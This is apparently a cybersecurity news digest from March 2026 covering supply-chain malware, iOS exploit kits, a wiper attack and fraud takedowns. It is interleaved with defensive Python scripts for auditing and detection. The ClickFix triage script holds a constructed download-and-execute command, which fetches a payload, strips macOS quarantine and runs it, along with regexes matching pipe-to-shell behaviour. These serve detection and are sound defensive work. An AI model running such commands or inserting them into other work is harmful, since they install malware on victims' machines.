CyberHappenings


News Summary

Last updated: 16:30 28/03/2026 UTC
  • Unauthenticated remote code execution flaw in Magento and Adobe Commerce via PolyShell polyglot uploads A critical unauthenticated remote code execution vulnerability named PolyShell affects all supported versions of Magento Open Source and Adobe Commerce (version 2), enabling attackers to upload polyglot files via the REST API and achieve code execution. Adobe has released a patch only in the alpha release of version 2.4.9, leaving production deployments vulnerable. Exploitation is now actively occurring in the wild, with mass scanning activity involving over 50 IP addresses since March 19, 2026, and successful compromises detected in 56.7% of all vulnerable stores. Attackers are leveraging the flaw to deploy a new WebRTC-based payment skimmer that bypasses Content Security Policy (CSP) and exfiltrates payment data via encrypted UDP, marking a significant evolution in skimmer tactics. Immediate remediation is critical given the widespread abuse and potential for mass compromise of e-commerce storefronts.
  • UK NCA and NatWest Warn of Rising Invoice Fraud Threats The UK National Crime Agency (NCA) and NatWest Bank initially warned of rising invoice fraud in January 2026, reporting nearly £4 million in losses from 83 cases in September 2025 and urging businesses to verify payment details. Recent attention has focused on the construction sector, where complex supply chains and high-value email payments create elevated risks. Invoice fraud, a form of business email compromise (BEC), involves impersonating suppliers by changing bank details on fake invoices or hijacking supplier email accounts to gather intelligence before issuing fraudulent invoices. The NCA reports that construction and manufacturing accounted for a quarter of all invoice fraud cases in 2024/25, the highest of any sector. The agency is actively disrupting criminal networks while promoting prevention measures such as checking for email anomalies, verifying invoices via trusted channels, and requiring colleague authorization for high-value payments. Globally, BEC scams cost nearly $2.8 billion in 2024, according to the FBI, underscoring the severity of the threat.
  • Tycoon2FA Phishing-as-a-Service Takedown Tycoon2FA, a subscription-based phishing-as-a-service (PhaaS) platform active since August 2023, bypassed multi-factor authentication with adversary-in-the-middle techniques and targeted major services such as Microsoft 365 and Google. It was linked to over 64,000 phishing incidents and facilitated unauthorized access to nearly 100,000 organizations globally by mid-2025. A global takedown on March 4, 2026, involving Europol’s EC3 and law enforcement from six European countries, reduced campaign volumes only briefly: daily volumes were back at early 2026 levels by March 6. The primary operator, known as 'SaaadFridi' and 'Mr_Xaad', remains at large. The platform’s infrastructure relied on AI-generated decoy pages and short-lived domains to evade detection, while customers used tactics such as ATO Jumping to distribute phishing URLs. Post-compromise activity included business email compromise (BEC), email thread hijacking, cloud account takeovers, and malicious SharePoint links. Old infrastructure remained active after the disruption, new phishing domains and IP addresses were registered quickly, and operators continued using unchanged TTPs, including compromised domains, legitimate cloud services, and IPv6-based automated logins, underscoring the resilience of the PhaaS model when a takedown involves no arrests or physical seizures.
  • Takedown of fraudulent CSAM distribution scam platform "Alice with Violence CP" An international Europol-backed law enforcement operation, codenamed Operation Alice, dismantled the fraudulent dark web platform "Alice with Violence CP" and over 373,000 related sites advertising fake child sexual abuse material (CSAM) and cybercrime-as-a-service (CaaS) offerings. The takedown ran from March 9–19, 2026, and involved 22 countries, including Germany, the US, UK, and Ukraine. The platform, operated by a 35-year-old Chinese national, defrauded approximately 10,000 victims into paying between €17 and €215 in Bitcoin, extracting an estimated €345,000 ($396,000) over a six-year period (2019–2025). The scam advertised both non-existent CSAM packages and CaaS services such as stolen card data and access to compromised systems. Authorities identified 440 users in 23 countries, with over 100 under investigation for attempted CSAM purchase. Seized infrastructure included 287 servers, 105 of which were located in Germany. An international arrest warrant has been issued for the operator. The operation follows other major takedowns, including the 2024 Kidflix CSAM platform disruption, highlighting continued cross-border efforts against online child exploitation.
  • Tag poisoning in Trivy GitHub Actions repositories delivers cloud-native infostealer payload Attackers compromised two official Trivy-related GitHub Actions repositories, aquasecurity/trivy-action and aquasecurity/setup-trivy, and backdoored Trivy v0.69.4 releases, distributing a Python-based infostealer that harvests wide-ranging CI/CD and developer secrets. The payload executes in GitHub Actions runners and Trivy binaries, remaining active for up to 12 hours in Actions tags and three hours in the malicious release. The actors leveraged compromised credentials from a prior March incident and added persistence via systemd services, while also linking to a follow-up npm campaign using the CanisterWorm self-propagating worm. The incident traces to a credential compromise initially disclosed in early March 2026, which was not fully contained and enabled subsequent tag and release manipulations. Safe releases are now available and mitigation includes pinning Actions to full SHA hashes, blocking exfiltration endpoints, and rotating all affected secrets.
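The Trivy item above closes with the mitigation of pinning Actions to full commit SHAs. The script below is an added example, not CyberHappenings' or Aqua Security's code: it audits a workflow file for uses: references that still point at a mutable tag or branch, which a repository compromise of the kind described can repoint. The sample workflow, its version tags and its 40-hex placeholder SHA are constructed for the demonstration.

```python
"""Flag GitHub Actions 'uses:' references that are not pinned to a full commit SHA.

A tag such as @v4 or @0.28.0 is a mutable pointer that whoever controls the action's
repository can move; a 40-hex commit SHA cannot be repointed without changing the value
in the consuming workflow.
"""
import re

# 'uses:' entries as written in workflow YAML: owner/repo[/path]@ref, optional comment.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)['\"]?", re.MULTILINE)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def audit_workflow(yaml_text):
    """Return [(ref, status)] for every uses: entry in the workflow text.

    status is 'pinned' (full commit SHA), 'local' (./path or docker:// reference, which
    a SHA pin does not apply to), or 'mutable' (branch, tag, or no ref at all)."""
    findings = []
    for m in USES_RE.finditer(yaml_text):
        ref = m.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            findings.append((ref, "local"))
            continue
        if "@" not in ref:
            findings.append((ref, "mutable"))  # resolves to the default branch
            continue
        _, version = ref.rsplit("@", 1)
        findings.append((ref, "pinned" if FULL_SHA_RE.match(version) else "mutable"))
    return findings


def unpinned(yaml_text):
    """Just the references a reviewer should replace with a commit SHA."""
    return [ref for ref, status in audit_workflow(yaml_text) if status == "mutable"]


# Constructed sample workflow (versions and SHA are placeholders, not real releases).
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  trivy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run Trivy
        uses: aquasecurity/trivy-action@0.28.0
      - uses: aquasecurity/setup-trivy@0123456789abcdef0123456789abcdef01234567 # pinned
      - uses: ./.github/actions/local-step
"""

if __name__ == "__main__":
    for ref, status in audit_workflow(SAMPLE_WORKFLOW):
        print(f"{status:8} {ref}")
```

Run it over every file under .github/workflows; anything reported as mutable should be replaced by the commit SHA of the release you reviewed, with the human-readable tag kept in a trailing comment as the sample does.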

Latest updates


Iranian Hacktivist Group Claims Wiper Attack on Stryker

Updated: 28.03.2026 17:40 · First: 11.03.2026 18:20 · 📰 8 src / 8 articles

The Iranian hacktivist group Handala—linked to Iran’s Ministry of Intelligence and Security (MOIS)—conducted a destructive wiper attack against Stryker, a U.S. Fortune 500 medical technology company, on March 11, 2026. The attack affected over 200,000 systems across 79 countries, disrupted operations in Ireland, and sent over 5,000 workers home. Handala claimed responsibility, citing retaliation for a U.S. missile strike. The attack leveraged Microsoft Intune to issue remote wipe commands and defaced Stryker’s Entra login page. Stryker confirmed the incident in an SEC filing and reported no evidence of data exfiltration. Recovery efforts prioritized restoring supply-chain systems. In a separate but related development, Handala breached the personal email account of FBI Director Kash Patel on March 28, 2026, and leaked historical emails from 2010 and 2019. The FBI acknowledged the targeting and stated the leaked data was not government-related. Handala operates under multiple monikers, including Banished Kitten and Void Manticore, and has integrated criminal tools such as Rhadamanthys stealer to enhance its operations. The group’s activities align with broader Iranian cyber operations targeting Western entities amid heightened geopolitical tensions, including destructive attacks, hack-and-leak campaigns, and psychological influence operations. U.S. authorities have seized multiple domains linked to Handala and offered a $10 million reward for information on group members.
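The Stryker attack was carried out through Intune remote wipe commands, which is an auditable action rather than a covert one. The detector below is an added example, not Stryker's, Microsoft's or any vendor's code. It runs over Intune audit events shaped like the Microsoft Graph deviceManagement/auditEvents resource (activityDateTime, activityType, actor, resources) and alerts when one actor issues an unusual number of wipes inside a short window. The exact activityType string Intune emits for a wipe is assumed to contain the word "wipe", so the match is case-insensitive and substring-based; all events are constructed.

```python
"""Alert on bursts of Intune remote-wipe commands attributed to a single actor."""
from collections import defaultdict
from datetime import datetime, timedelta


def is_destructive(event):
    """True for wipe (and retire) actions; the activityType text is assumed to name them."""
    activity = (event.get("activityType") or "").lower()
    return "wipe" in activity or "retire" in activity


def wipe_bursts(events, window=timedelta(minutes=10), threshold=5):
    """Return {actor: peak} for actors whose destructive actions reached `threshold`
    inside any sliding window of length `window`.

    One helpdesk user wiping a few lost laptops over a day stays under the threshold;
    an abused admin account or automation wiping a fleet does not."""
    by_actor = defaultdict(list)
    for ev in events:
        if not is_destructive(ev):
            continue
        actor = ev["actor"]
        who = actor.get("userPrincipalName") or actor.get("applicationDisplayName") or "?"
        # Graph timestamps end in 'Z'; fromisoformat wants an explicit offset on older Pythons.
        by_actor[who].append(datetime.fromisoformat(ev["activityDateTime"].replace("Z", "+00:00")))

    alerts = {}
    for who, stamps in by_actor.items():
        stamps.sort()
        left, peak = 0, 0
        for right, ts in enumerate(stamps):
            while ts - stamps[left] > window:   # slide the window's left edge forward
                left += 1
            peak = max(peak, right - left + 1)
        if peak >= threshold:
            alerts[who] = peak
    return alerts


def make_event(ts, actor, activity, device):
    """Build a constructed audit event in the Graph auditEvents shape."""
    return {"activityDateTime": ts, "activityType": activity,
            "actor": {"userPrincipalName": actor},
            "resources": [{"displayName": device, "type": "ManagedDevice"}]}


# Constructed sample: a helpdesk user wipes two lost laptops hours apart (benign);
# a service account wipes six workstations in six minutes (burst).
SAMPLE_EVENTS = [
    make_event("2026-03-11T13:05:00Z", "helpdesk@example.com", "wipe ManagedDevice", "LT-0042"),
    make_event("2026-03-11T15:40:00Z", "helpdesk@example.com", "wipe ManagedDevice", "LT-0101"),
    make_event("2026-03-11T18:20:00Z", "helpdesk@example.com", "syncDevice ManagedDevice", "LT-0101"),
] + [
    make_event(f"2026-03-11T18:2{i}:00Z", "svc-intune@example.com", "wipe ManagedDevice", f"WS-{i:04d}")
    for i in range(6)
]

if __name__ == "__main__":
    print(wipe_bursts(SAMPLE_EVENTS))
```

Tune the window and threshold to the tenant's normal wipe rate; the useful signal is the per-actor burst, and the same sliding-window logic applies to bulk retire, autopilot reset or conditional-access policy edits once the activityType filter is widened.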

Infinity Stealer macOS infostealer delivered via ClickFix CAPTCHA lures

First: 28.03.2026 16:35 · 📰 1 src / 1 article

A new macOS-targeting infostealer named Infinity Stealer is being distributed via ClickFix CAPTCHA lures impersonating Cloudflare’s human verification, leading victims to execute a base64-obfuscated Bash command that fetches and runs a Nuitka-compiled Python payload. The attack abuses a fake CAPTCHA on update-check[.]com to bypass OS defenses and install a Mach-O loader that extracts a zstd-compressed archive containing the stealer. Infinity Stealer harvests browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets from developer files, and exfiltrates data via HTTP POST to C2 with Telegram notifications to operators.
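The lure described above depends on the victim pasting a base64-wrapped Bash one-liner into Terminal, so the stage-one script is recoverable from shell history, process telemetry or the pasteboard. The triage script below is an added example, not the report's or the malware's code: it decodes any base64 run in a captured command line and flags download-and-execute behaviour in the decoded text. The sample one-liner is constructed; only the lure domain update-check[.]com comes from the report, and it is kept defanged.

```python
"""Decode and triage ClickFix-style one-liners that hide a Bash stage in base64."""
import base64
import binascii
import re

B64_RUN = re.compile(r"[A-Za-z0-9+/=]{40,}")          # long enough to be a script
URL = re.compile(r"https?://[^\s'\"<>]+")
# Behaviours worth flagging in a decoded stage-one script.
SUSPICIOUS = {
    "downloads a file": re.compile(r"\b(curl|wget)\b"),
    "pipes into a shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "marks a dropped file executable": re.compile(r"\bchmod\s+\+?[0-7]*x"),
    "strips Gatekeeper quarantine": re.compile(r"xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine"),
    "writes to a temp dir": re.compile(r"/(tmp|private/tmp|var/tmp)/"),
}


def decode_blobs(cmd):
    """Return decoded text for every base64 run in cmd that decodes to readable text."""
    out = []
    for m in B64_RUN.finditer(cmd):
        blob = m.group(0)
        blob += "=" * (-len(blob) % 4)                  # tolerate stripped padding
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            out.append(text)
    return out


def triage(cmd):
    """Decode the stages hidden in cmd and classify them.

    Returns decoded stages, matched behaviours, URLs found in the decoded text, and a
    verdict: malicious when the script both fetches something and runs it."""
    stages = decode_blobs(cmd)
    combined = "\n".join(stages)
    hits = [name for name, rx in SUSPICIOUS.items() if rx.search(combined)]
    malicious = "downloads a file" in hits and any(
        h in hits for h in ("pipes into a shell", "marks a dropped file executable"))
    return {"stages": stages, "behaviours": hits, "urls": URL.findall(combined), "malicious": malicious}


def make_lure(script):
    """Wrap a stage-one script the way the fake CAPTCHA presents it (macOS base64 uses -D)."""
    return "echo " + base64.b64encode(script.encode()).decode() + " | base64 -D | bash"


# Constructed stage one: fetch a loader, strip quarantine so Gatekeeper stays quiet, run it.
SAMPLE_SCRIPT = ("curl -fsSL https://update-check[.]com/verify -o /tmp/.cf && "
                 "xattr -d com.apple.quarantine /tmp/.cf; chmod +x /tmp/.cf && /tmp/.cf")
LURE_COMMAND = make_lure(SAMPLE_SCRIPT)

if __name__ == "__main__":
    for key, value in triage(LURE_COMMAND).items():
        print(f"{key}: {value}")
```

Feed it lines from ~/.zsh_history or the command-line field of process-start events; a decoded stage that downloads and executes is worth an alert even before the second-stage binary is recovered, and the URLs it yields are the first indicators to block.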

Russian UNC6353 Uses Coruna and Darksword iOS Exploit Kits Across iOS 13–18.7 Targeting Financial Espionage and Data Theft

Updated: 27.03.2026 19:22 · First: 04.03.2026 15:28 · 📰 13 src / 15 articles

Apple has begun sending Lock Screen notifications to iPhones and iPads running outdated iOS versions, warning users of active web-based exploits and urging immediate updates. This follows Apple’s support document alerting users to the Coruna (iOS 13–18.7) and Darksword (iOS 18.4–18.7) exploit kits and the public leak of a newer Darksword version on GitHub. Coruna and Darksword are now independently confirmed as closely related frameworks with shared origins in the 2019–2023 Operation Triangulation campaign, reinforcing attribution to the Russian threat actor UNC6353 and associated groups. Coruna has evolved from a precision espionage tool into a mass-exploitation framework with 23 exploits across five chains, while the leaked Darksword targets iOS 18.7. Apple has patched all exploited flaws in recent releases (18.7.3, 26.2, 26.3.1), and CISA has mandated that federal agencies patch three Darksword-linked vulnerabilities (CVE-2025-31277, CVE-2025-43510, CVE-2025-43520) by April 3, 2026. Campaigns linked to UNC6353, UNC6748, and the Turkish vendor PARS Defense highlight the growing commoditization of iOS exploitation tools and the elevated risk to end users globally.

GlassWorm malware targets OpenVSX, VS Code registries

Updated: 27.03.2026 18:51 · First: 20.10.2025 19:13 · 📰 15 src / 34 articles

GlassWorm has escalated into a multi-stage framework combining remote access trojans (RATs), data theft, and hardware wallet phishing, with the latest iteration leveraging Solana dead drops for C2, a novel browser extension for surveillance, and a shift into the Model Context Protocol (MCP) ecosystem. The campaign now delivers a .NET binary that targets Ledger and Trezor devices by masquerading as configuration errors and prompting users to input recovery phrases, while a WebSocket-based JavaScript RAT exfiltrates browser data, executes arbitrary code, and deploys HVNC or SOCKS proxy modules. The malware uses a Google Chrome extension disguised as Google Docs Offline to perform session surveillance on cryptocurrency platforms like Bybit and harvest extensive browser data. Additionally, threat actors have begun distributing malicious payloads via npm packages impersonating the WaterCrawl MCP server, marking GlassWorm’s first confirmed incursion into the AI-assisted development ecosystem. The GlassWorm campaign remains a persistent supply chain threat impacting multiple ecosystems including npm, PyPI, GitHub, and Open VSX. Since its emergence in October 2025, the campaign has evolved from invisible Unicode steganography in VS Code extensions to a sophisticated multi-vector operation spanning 151 compromised GitHub repositories and dozens of malicious npm packages. The threat actor, assessed to be Russian-speaking, continues to avoid infecting Russian-locale systems and leverages Solana blockchain transactions as dead drops for C2 resolution. Recent developments include the ForceMemo offshoot that force-pushes malicious code into Python repositories, the abuse of extensionPack and extensionDependencies for transitive malware delivery, and the introduction of Rust-based implants targeting developer toolchains.
The Eclipse Foundation and Open VSX have implemented security measures such as token revocation and automated scanning, but the threat actors have repeatedly adapted by rotating infrastructure, obfuscating payloads, and expanding into new ecosystems like MCP servers. A new large-scale social engineering campaign has emerged, using fake VS Code security alerts posted in GitHub Discussions to distribute malware. The campaign automates posts across thousands of repositories using low-activity accounts, triggering GitHub email notifications with fake vulnerability advisories containing realistic CVE references. Links in these posts redirect victims through a cookie-driven chain to drnatashachinn[.]com, where a JavaScript reconnaissance payload profiles targets before delivering additional malicious payloads. This operation represents a coordinated, large-scale effort targeting developers as part of the broader GlassWorm malware campaign.
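Two of the GlassWorm techniques above can be checked for locally before an extension is installed or published: invisible Unicode in a script file, and extensionPack or extensionDependencies entries that make a clean-looking extension pull others in. The scanner below is an added example, not Open VSX's, the Eclipse Foundation's or the campaign's code. It treats zero-width characters, variation selectors, Unicode tag characters and other format or private-use code points as foreign to source code and lists the transitive installs declared in package.json; the sample extension files are constructed.

```python
"""Audit a VS Code extension for invisible Unicode in scripts and for transitive installs."""
import json
import unicodedata

# Code points that render as nothing but survive copy, paste and diff views.
ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF, 0x180E, 0x00AD}


def is_invisible(ch):
    """True for characters that have no visible glyph and no place in source code."""
    cp = ord(ch)
    if cp in ZERO_WIDTH:
        return True
    if 0xFE00 <= cp <= 0xFE0F or 0xE0100 <= cp <= 0xE01EF:   # variation selectors (category Mn)
        return True
    if 0xE0000 <= cp <= 0xE007F:                              # tag characters
        return True
    return unicodedata.category(ch) in ("Cf", "Co")           # other format / private-use


def scan_source(text):
    """Return [(line, column, 'U+XXXX')] for every invisible character in text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if is_invisible(ch):
                findings.append((lineno, col, f"U+{ord(ch):04X}"))
    return findings


def transitive_installs(package_json):
    """Extension IDs that installing this extension silently installs as well."""
    meta = json.loads(package_json)
    return sorted(set(meta.get("extensionPack", [])) | set(meta.get("extensionDependencies", [])))


def audit_extension(files):
    """files maps path -> text for an unpacked extension.

    Returns per-file invisible-character findings, the transitive installs, and a
    'suspicious' flag that is True when either is non-empty."""
    report = {"invisible": {}, "pulls_in": []}
    for path, text in files.items():
        if path.endswith("package.json"):
            report["pulls_in"] = transitive_installs(text)
        elif path.endswith((".js", ".mjs", ".cjs", ".ts")):
            hits = scan_source(text)
            if hits:
                report["invisible"][path] = hits
    report["suspicious"] = bool(report["invisible"] or report["pulls_in"])
    return report


# Constructed sample: a one-line activate() followed by a line an editor renders as blank
# (two variation selectors, one supplementary variation selector, one zero-width space).
HIDDEN = "\ufe0e\ufe0f\U000e0101\u200b"
SAMPLE_FILES = {
    "package.json": json.dumps({"name": "demo-theme", "extensionPack": ["vendor.helper"]}),
    "extension.js": "exports.activate = () => {};\n" + HIDDEN + "\n",
}

if __name__ == "__main__":
    print(json.dumps(audit_extension(SAMPLE_FILES), indent=2))
```

A hit does not prove malice (some legitimate files carry a BOM or a stray soft hyphen), but a run of variation selectors or tag characters in a script is not something a human wrote, and a theme or snippet pack that declares an extensionPack deserves a look at what it pulls in.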

TeamPCP escalates CanisterWorm campaign with geopolitical targeting and multi-vector attacks

Updated: 27.03.2026 17:06 · First: 21.03.2026 09:28 · 📰 6 src / 9 articles

TeamPCP has escalated its multi-vector CanisterWorm campaign into a broader geopolitically targeted operation, now compromising trusted PyPI packages to deliver credential-stealing malware with automated execution mechanisms. The group has targeted the LiteLLM and Telnyx Python packages (versions 1.82.7, 1.82.8, 4.87.1, and 4.87.2), embedding malware that harvests SSH keys, cloud credentials, Kubernetes secrets, database credentials, cryptocurrency wallets, TLS/SSL private keys, and bash history files before exfiltrating data to attacker-controlled infrastructure and establishing persistent backdoors. The campaign began as a supply-chain attack involving 47 compromised npm packages and the @teale.io/eslint-config variant, leveraging ICP canisters for decentralized C2 and persistence via masqueraded systemd services. It escalated to include GitHub repository hijacking (e.g., Aqua Security), Docker Hub compromise, and deployment of an infostealer, then pivoted to targeting CI/CD pipelines directly via GitHub Actions workflows (e.g., Checkmarx, Trivy) using stolen credentials. TeamPCP now compromises GitHub Actions workflows and Open VSX extensions to deploy the TeamPCP Cloud stealer, while refining destructive payloads targeting Iranian systems in Kubernetes environments with time-zone/locale-based wipers. Recent compromises of LiteLLM and Telnyx demonstrate rapid iteration and maturation of supply chain attack methodology, with evidence suggesting collaboration with the Vectr ransomware group for follow-on ransomware operations.
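The four version strings named above are exact release identifiers, so the first response in a Python shop is to find out whether any lockfile or deployed environment pins them. The checker below is an added example, not the reporters' or the LiteLLM and Telnyx projects' code. The mapping of 1.82.7 and 1.82.8 to litellm and of 4.87.1 and 4.87.2 to telnyx is inferred from the two projects' version lines and is marked as an assumption in the code; confirm it against the advisory you act on. The sample requirements text is constructed.

```python
"""Find the compromised LiteLLM and Telnyx releases in requirements text or the running
interpreter, with PEP 503 name normalization so LiteLLM, litellm and Lite_LLM all match."""
import re
from importlib import metadata

# Known-bad releases keyed by normalized project name (package mapping is assumed).
COMPROMISED = {
    "litellm": {"1.82.7", "1.82.8"},
    "telnyx": {"4.87.1", "4.87.2"},
}

# name, optional [extras], exact pin, version (stops at whitespace, ';' marker or '#').
REQ_LINE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:\[[^\]]*\])?\s*(===|==)\s*([^\s;#]+)")


def normalize(name):
    """PEP 503: case-insensitive, any run of '-', '_' or '.' becomes a single hyphen."""
    return re.sub(r"[-_.]+", "-", name).lower()


def check_requirements(text):
    """Classify each requirement line.

    Returns {'compromised': [(name, version)], 'unpinned': [name]}. Only exact pins can
    be judged offline; ranges and bare names are reported so the caller resolves them."""
    compromised, unpinned = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):         # blank, comment, -r/-e options
            continue
        m = REQ_LINE.match(line)
        if not m:
            name = re.split(r"[<>=!~;\[\s]", line, maxsplit=1)[0]
            unpinned.append(normalize(name))
            continue
        name, version = normalize(m.group(1)), m.group(3)
        if version in COMPROMISED.get(name, set()):
            compromised.append((name, version))
    return {"compromised": compromised, "unpinned": unpinned}


def check_installed():
    """Return [(name, version)] for compromised releases installed in this interpreter."""
    hits = []
    for dist in metadata.distributions():
        name = normalize(dist.metadata.get("Name", "") or "")
        if dist.version in COMPROMISED.get(name, set()):
            hits.append((name, dist.version))
    return hits


# Constructed sample lockfile.
SAMPLE_REQUIREMENTS = """\
# pinned by CI
LiteLLM==1.82.7
telnyx[async]==4.87.0
Telnyx==4.87.2
requests>=2.31
litellm==1.81.9  ; python_version >= "3.9"
"""

if __name__ == "__main__":
    print(check_requirements(SAMPLE_REQUIREMENTS))
    print("installed:", check_installed())
```

Run check_installed on every build agent and container image, not only on developer laptops; a hit means the secrets the stealer targets (SSH keys, cloud and Kubernetes credentials, TLS private keys) on that host should be treated as exposed and rotated.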

Enterprise GRC teams face operational identity crisis as agentic AI replaces workflows

First: 27.03.2026 16:02 · 📰 1 src / 1 article

Enterprise Governance, Risk, and Compliance (GRC) teams equipped with agentic AI tools are confronting an operational identity crisis as autonomous agents assume core workflows such as evidence collection, control monitoring, and audit preparation. The transition exposes a long-standing misalignment between traditional GRC roles—centered on operational execution—and the profession’s intended purpose: strategic risk insight and organizational protection. Practitioners report reluctance not due to technological limitations, but because the relinquishing of operations-based tasks challenges their professional identity and value proposition. Organizations progressing toward agentic GRC are redefining practitioner roles toward judgment-driven risk leadership, leveraging years of accrued expertise to define risk appetite, validate control efficacy, and interpret business context into compliance logic.

Bypass of Open VSX Pre-Publish Scanning via Boolean Return Value Flaw

First: 27.03.2026 15:57 · 📰 1 src / 1 article

A design flaw in Open VSX’s pre-publish scanning pipeline enabled malicious Visual Studio Code (VS Code) extensions to bypass security vetting and become publicly available in the registry. The issue stemmed from a single boolean return value that conflated two distinct states: absence of configured scanners and scanner job failures. Under load, scanner failures (e.g., due to exhausted database connection pools) were misinterpreted as "no scanners configured," causing the system to mark extensions as passed and activate them immediately. This affected both the initial publish flow and a recovery service designed to retry failed scans. An attacker with a standard publisher account could exploit the flaw by flooding the publish endpoint to exhaust the database connection pool, preventing scan jobs from enqueuing and allowing malicious extensions to evade detection. The flaw was patched in Open VSX version 0.32.0 on March 3, 2026, following disclosure on February 8, 2026.
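The flaw above is a classic fail-open: one boolean answers "must activation wait for a scan?" and cannot distinguish "no scanner configured" from "the scan job never started". The model below is an added example written in Python, not Open VSX's code (the real pipeline is Java), and it simulates the pool exhaustion the report describes: a scan queue with a small connection pool, a vulnerable publish flow that activates extensions once enqueues start failing, and a fixed flow that returns a three-state outcome and leaves failed scans pending for a retry service. Names and pool sizes are constructed.

```python
"""Open VSX-style scan gating: a vulnerable boolean flow beside a fail-closed rewrite."""
from enum import Enum


class PoolExhausted(Exception):
    """Stands in for a database connection-pool timeout while enqueuing a scan job."""


class ScanQueue:
    """Simulated job queue whose enqueue needs one of a limited set of connections."""

    def __init__(self, scanners, pool_size):
        self.scanners = list(scanners)      # configured scanner names; empty means none
        self.pool_size = pool_size
        self.in_flight = 0
        self.jobs = []

    def enqueue(self, extension):
        if self.in_flight >= self.pool_size:
            raise PoolExhausted(extension)
        self.in_flight += 1
        self.jobs.append(extension)


# --- vulnerable: one boolean means both "nothing to scan" and "could not scan" --------
def scan_blocks_activation(queue, extension):
    """True only if a scan job was actually enqueued."""
    if not queue.scanners:
        return False                        # no scanners: nothing to wait for
    try:
        queue.enqueue(extension)
        return True
    except PoolExhausted:
        return False                        # BUG: same answer as "no scanners configured"


def publish_vulnerable(queue, extension):
    """Returns the extension's state after publish: 'pending' or 'active'."""
    return "pending" if scan_blocks_activation(queue, extension) else "active"


# --- fixed: three distinct outcomes, and only one of them activates --------------------
class ScanOutcome(Enum):
    NOT_CONFIGURED = "no scanners configured"
    QUEUED = "scan job queued"
    FAILED = "scan job could not be queued"


def request_scan(queue, extension):
    if not queue.scanners:
        return ScanOutcome.NOT_CONFIGURED
    try:
        queue.enqueue(extension)
        return ScanOutcome.QUEUED
    except PoolExhausted:
        return ScanOutcome.FAILED


def publish_fixed(queue, extension):
    """'active' only when no scanner is configured; QUEUED and FAILED both stay 'pending'
    (a failed enqueue is left for the recovery service, never counted as a pass)."""
    if request_scan(queue, extension) is ScanOutcome.NOT_CONFIGURED:
        return "active"
    return "pending"


def flood(publish, scanners=("malware-scan",), pool_size=2, n=5):
    """Publish n extensions against one queue and return their states in order.
    Once the pool is full, the remaining publishes are the attacker's."""
    queue = ScanQueue(scanners, pool_size)
    return [publish(queue, f"ext-{i}") for i in range(n)]


if __name__ == "__main__":
    print("vulnerable:", flood(publish_vulnerable))
    print("fixed:     ", flood(publish_fixed))
```

The general lesson is the same wherever a security check returns a boolean: "check did not run" must be a separate, non-passing state, and the retry path has to treat it that way too, since the report notes the recovery service shared the same defect.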

Harvest Now, Decrypt Later: Urgent Need for Post-Quantum Cryptography Migration

Updated: 27.03.2026 14:30 · First: 26.02.2026 14:06 · 📰 2 src / 2 articles

Google has accelerated the timeline for post-quantum cryptography (PQC) migration, warning that traditional encryption methods could become obsolete as early as 2029 due to quantum computing advancements. The 'Harvest Now, Decrypt Later' (HNDL) strategy remains a critical threat, with adversaries storing encrypted data for future decryption. Organizations must urgently adopt PQC to secure long-term sensitive data, with Google’s Android 17 integrating PQC digital signature protection in alignment with NIST standards. Regulatory and industry timelines, including those from the NSA and NCSC, remain aligned around 2033–2035, but Google’s 2029 deadline underscores the need for immediate action.

European Commission Investigates Breach in Mobile Device Management Platform

Updated: 27.03.2026 14:22 · First: 09.02.2026 11:49 · 📰 2 src / 2 articles

The European Commission is investigating a second breach, this time involving its Amazon cloud infrastructure where a threat actor gained access to at least one account managing cloud resources. The attacker stole over 350 GB of data, including databases and employee information, and plans to leak the data online without extortion intent. This incident follows the January 30, 2026 breach of the Commission’s mobile device management platform, which was linked to Ivanti EPMM vulnerabilities and contained within 9 hours. The compromised data in that incident included staff names, phone numbers, and business email addresses. The Commission has not disclosed details of the cloud breach but confirmed its cybersecurity incident response team is investigating. The attacks coincide with the Commission’s January 20 proposal for new cybersecurity legislation to strengthen defenses against state-backed actors and cybercrime groups targeting Europe’s critical infrastructure.

Evolving global cyber conflict landscape reshaping critical infrastructure and extortion threats

First: 27.03.2026 13:00 · 📰 1 src / 1 article

The geopolitical landscape has shifted from an era of relative stability under Pax Americana to one where technology is weaponized and cyber operations are integral to state power projection. State-linked actors, particularly China- and Russia-aligned groups, are intensifying campaigns targeting critical infrastructure, telecommunications, and government networks with long-dwell access, stealthy backdoors, and operational technology (OT) compromise. Non-state actors, including hacktivists and cybercriminals, have aligned with geopolitical agendas, executing disruptive operations that blur the line between activism, crime, and statecraft, often with physical consequences. Cyber extortion remains a dominant threat, driven by commoditized attack ecosystems and persistent failures in basic cyber hygiene, despite increased law-enforcement disruption efforts.

AnimePlay streaming piracy operation disrupted with takedown of 5 million-user platform

First: 27.03.2026 12:40 · 📰 1 src / 1 article

An international anti-piracy coalition led by the Alliance for Creativity and Entertainment (ACE) disrupted the AnimePlay anime streaming platform, which allegedly served over 5 million registered users predominantly in Indonesia. ACE seized control of the platform’s infrastructure, including the application, 15 associated domains, backend code repositories, hosting environments, and related digital assets, rendering the service inoperable. The takedown included over 60 terabytes of infringing anime content and the surrender of backend systems, advertising tools, and 29 GitHub repositories containing full source code by the platform’s operator. The action follows ACE’s recent dismantling of Photocall, a piracy platform with 26 million annual users, and reflects ongoing global enforcement against large-scale illegal streaming services.

Windows 11 KB5079391 preview update introduces Smart App Control toggling and display reliability enhancements

First: 27.03.2026 11:20 · 📰 1 src / 1 article

